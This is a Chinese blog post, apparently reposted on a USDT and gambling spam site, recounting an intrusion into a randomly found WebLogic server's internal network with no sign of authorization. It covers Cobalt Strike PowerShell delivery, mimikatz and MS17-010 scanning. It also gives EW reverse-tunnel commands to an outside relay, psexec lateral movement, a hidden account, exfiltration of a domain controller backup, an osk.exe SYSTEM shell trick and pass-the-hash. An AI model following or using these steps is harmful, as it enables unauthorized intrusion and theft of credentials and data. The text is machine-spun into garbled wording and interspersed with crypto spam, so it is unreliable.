USDT交易平台

U交所(www.payusdt.vip),全球頂尖的USDT場外擔保交易平臺。

故事的原由对照简朴,用三个字来归纳综合吧:闲得慌。
由于主要照样想演习演习内网,以是用了最简朴粗暴的方式去找寻找目的,行使fofa来批量了一波weblogic,不出一会便找到了目的。

简朴的看了下机械环境,出网,没有杀软(后面发现现实是有一个很小众的防火墙的,然则不拦powershell),有内网环境。
以是这里直接实验cs自带的Scripted Web Delivery模块,直接确立一个web服务用于一键下载和执行powershell。


运行刚刚天生的powershell


这边的CS乐成上线。


这里我们先来看看系统的信息。


凭证上面的可知服务器是2012的,内网IP段在192.168.200.x
接着用Ladon扫了下内网环境。


这个内网段机械不多,可以看出有域环境。接着举行了多网卡检测,web检测。


可以看出这个内网有多个网段,开了一个web服务。
mimikatz只读到了一个用户跟加密的密码


密码可以在CMD5上解开


接下来就到最激悦耳心的扫描MS17010时刻!!!


可以看出有几台机械是可能存在MS17010的,以是设计开个socks署理直接MSF去打。
这里笔者劝人人买服务器的时刻,只管买按量计费的服务器,不要像笔者一样,妄想一时廉价,买了个带宽只有1M的HK服务器,CS自带的socks署理开了,内陆测试毗邻都失败,更别说其他操作了。
以是这里,笔者只能暂且开了个按量计费的服务器,行使EW重新开了一条隧道出来。详细流程如下:
把ew文件丢上刚刚开的服务器,执行:ew -s rcsocks -l 1900 -e 1200来设置一个转接隧道,意思就是将1900端口收到的署理请求转交给反连1200端口的主机


接着在目的机械上上传ew文件,执行:ew -s rssocks -d xxx.xxx.xxx.xxx(上方确立的服务器IP) -e 1200,开启目的主机socks5服务并反向毗邻到中转机械的1200端口,执行完稍等会就可以看到多了一行毗邻完成。


接着只需要在内陆设置下署理就OK了。
Windows程序的话一样平常用sockscap设置以下这个署理就好了。


由于我们要用的是内陆虚拟机内里的kali的MSF,kali的署理设置对照利便,先vim /etc/proxychains.conf ,在最下面加上署理


保留后直接proxychains 加上要启动的程序就挂上署理了。
好比我们msf要挂署理,就直接:proxychains msfconsole
内网之路永远是那么崎岖,在履历了一番换EXP,换工具+摇人之后,确定了MS17010确实是行使不了。
既然捷径走不了,那么换一条路,从web入手。


试了下弱口令注入啥的,没乐成,谷歌翻译都翻译不外来,就算进了后台估量也看不懂,照样找其他途径吧。
于是进一步更先信息搜集:


查看保留上岸凭证,无


查看共享盘算机列表
接着就更先实验接见共享盘算机的C盘


在最后一台时,发现乐成接见了
Ping一下机械获得IP 192.168.200.6

,

USDT跑分

U交所(www.payusdt.vip),全球頂尖的USDT場外擔保交易平臺。

,


右键一个beacon确立一个监听器

接着使用psexec_psh实验上线192.168.200.6这台服务器


乐成上线


接下来就对新上线的机械做一波信息搜集


没有其他发现
接下往返到起点,看看这个网段内里另有哪些机械


可以看到有四台linux机械,划分是22 , 1 , 5 , 11
这时刻我们可以实验一波弱口令。


只能说运气这玩意儿,用一点就少一点
简朴的查看了历程之类的信息,没有发现,虽然这时刻已经拿下了内网得两台机械,然则都不是域内机械,其他的linux主机测试弱口令又不准确,这时又陷入了僵局。
这时刻,我看到先前拿下的.6的那台机械名为veeam backup,料想这可能是一台备份服务器,他的硬盘内可能有备份文件,以是仔细检查了一下他的每个文件夹内容。
只能说真的,运气这玩意,该来的时刻挡也挡不住。
在D盘的文件夹下,发现了一个叫Backup的文件夹,内里存放了三个机械的备份。
简朴百度了下后缀,发现是一款叫Veeam® Backup & Replication的软件,他的功效是专门为Vsphere等做备份。


一瞬间我的思绪就清晰了,只需要在内陆安装Veeam® Backup & Replication这软件,再将这台DC的全量备份包压缩传到内陆,再恢复成虚拟机,然后通过PE,用CMD.EXE重命名笼罩了OSK.exe,这样子就可以在登录界面调出system的下令行,再想设施添加治理员账户或者修改治理员账户进入界面,内陆上线CS,再举行hashdump直接读出存储的域内用户HASH,在通过Pth就可以直接拿下线上的DC了。
说干就干,由于这台备份服务器不出网,然则他和21这台出网机械有一个共享文件夹,为了利便行事,偷偷在备份服务器上确立了一个隐藏账号,直接7z把最新的一个DC全量备份压缩成700M一个的压缩包,所有放到了共享文件夹中。
出网的这台机械也只有7001端口出网,以是找到了weblogic的web路径,从共享文件夹中把压缩包都放进了web路径中,从web端举行下载。由于这台出网机械的带宽着实是太低了,均速200K,还一直的卡掉,在经由了漫长的守候后,终于下了下来。
在这漫长的下载历程中,我先一步本机下载下了Veeam® Backup & Replication这软件,
突然发现一个很有意思的地方,就是他可以支持内陆治理员账号登录。


又由于他备份的是其他IP的虚拟机,我料想他应该是上岸了Vsphere。
以是又一次挂署理连上去看看。果真猜的没错,芜湖腾飞。。相当于治理员权限。。。


内陆下载的谁人全量备份在内陆还原也很简朴,只需要装了软件双击就回自动打开软件。


还原完成


接下来就简朴了。下载老毛桃 ,天生一个ISO的pe工具箱


挂载到虚拟机中,开机按ESC


进入PE后,重命名cmd.exe为osk.exe将原来C盘中的\windows\system32\osk.exe给笼罩了,这样子在开机的时刻打开屏幕键盘就会弹出SYSTEM权限的下令行。


这里直接添加用户泛起了点问题


最后将某个域用户修改密码后添加到内陆治理员组乐成进入了系统。
最后天生exe上线的时刻,憨批防火墙终于起珍爱了。
给憨憨防火墙一个正面图。


TMD在我内陆虚拟机还跟我横?看我不把你关了。


然而关闭要密码--算了算了,,忍一忍。
最后照样用最初的powershell上线了。


接着最有仪式感的一幕


最后只需要拿着hash去怼线上的DC就完事了。
完事收工睡觉。

Allbet Gaming声明:该文看法仅代表作者自己,与本平台无关。转载请注明:usdt充币教程(www.caibao.it):记一次完整的内网渗透履历
发布评论

分享到:

usdt充币教程(www.caibao.it):好莱坞“黄金配角”沃尔特·奥克维奇去世,享年72岁
你是第一个吃螃蟹的人
发表评论

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。